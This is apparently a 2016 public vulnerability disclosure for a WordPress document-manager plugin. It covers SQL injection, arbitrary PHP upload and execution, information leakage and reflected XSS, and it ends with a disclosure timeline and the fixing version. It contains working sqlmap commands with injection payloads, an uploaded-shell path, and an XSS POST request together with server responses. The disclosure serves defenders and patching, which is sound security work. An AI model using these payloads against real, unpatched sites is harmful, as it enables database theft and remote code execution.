* Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager * Discovery Date: 2016/01/13 * Public Disclosure Date: 2016/03/06 * Exploit Author: Michael Helwig * Contact: https://twitter.com/c0dmtr1x * Vendor Homepage: http://smartypantsplugins.com/ * Software Link: https://de.wordpress.org/plugins/sp-client-document-manager/ * Version: 2.5.9.6 * Tested on: WordPress 4.4.1 * Category: webapps Description =============================================================================== The Wordpress plugin "SP Projects & Document Manager" contains several vulnerabilities: arbitrary file upload and code execution by registered users, sql injections, information leakage and xss by unregistered users. PoC =============================================================================== 1. SQL-Injections ~~~~~~~~~~~~~~~~~~~ Several SQL injections have been known in version 2.4.1 but have been fixed in between. At least two of them reappeared in version 2.5.9.6: - The injections in the "id"-parameter on http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ ajax.php?function=download-project&id=1 - and the POST-Parameter vendor_email on http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ ajax.php?function=email-vendor See https://packetstormsecurity.com/files/129212/\ WordPress-SP-Client-Document-Manager-2.4.1-SQL-Injection.html for the original information on this. Both injections can be exploited by sqlmap: [1] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\ -manager/admin/ajax.php?function=download-project&id=1*" -p id --dbms mysql [2] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document\ -manager/admin/ajax.php?function=email-vendor" --data="vendor_email[]=0) \ OR (1=1 *" --dbms mysql 2. Arbitrary code executions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Clients can upload PHP files (*.php, *.php5 etc.) and execute them via a GET request to their specific location in the default upload path (which can vary depending on the configuration of the plugin). The URL to uploaded files typically looks like /wp-content/uploads/sp-client-document-manager/[UPLOADER-ID]/[FILE] e.g. http://wordpress.local.de/wp-content/uploads/sp-client-document-manager\ /1/shell.php Files can even be accessed directly if the option "Require Login to Download" is checked in the plugin configuration. 3. Information leakage ~~~~~~~~~~~~~~~~~~~~~~~ Information about uploaded files can be retrieved by non-logged in users via a call to admin/ajax.php: ----------------------- GET http://wordpress.local.de/wp-content/plugins/sp-client-document-manager\ /admin/ajax.php?function=get-file-info&id=1 -- response -- 200 OK Date: Wed, 13 Jan 2016 22:17:46 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.14 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Length: 211 Connection: close Content-Type: application/json {"id":"1","name":"in.php","file":"index.php","notes":"","tags":"","uid":"1",\ "cid":"0","pid":"0","parent":"0","date":"2016-01-13 15:18:27","status":"0",\ "form_id":"0","entry_id":"0","group_id":"0","client_id":"0"} --------------- Specifically you can retrieve info about the upload user id and filename to determine the URL for direct access to the file (see 3). 4. XSS Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~ There is a (non-persistent) XSS vulnerability in the admin/ajax.php file for function=email-vendor: --------------- POST http://wordpress.local.de/wp-content/plugins/sp-client-document-manager\ /admin/ajax.php?function=email-vendor Content-Type: application/x-www-form-urlencoded vendor_email[]=1&vendor=<script>alert(1);</script> -- response -- 200 OK Date: Sun, 06 Mar 2016 10:00:30 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 101 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html <p style="color:green;font-weight:bold">Dateien gesendet an <script>alert(1);\ </script></p> --------------- Timeline =============================================================================== 2016/01/13 - Issues discovered 2016/01/14 - Issues reported to vendor via contact form on his website 2016/01/27 - No response from vendor; WordPress security team notified 2016/01/29 - Reply from Wordpress security team 2016/03/02 - Vendor released security update 2.6.0.0 - issues fixed Solution =============================================================================== Update to latest version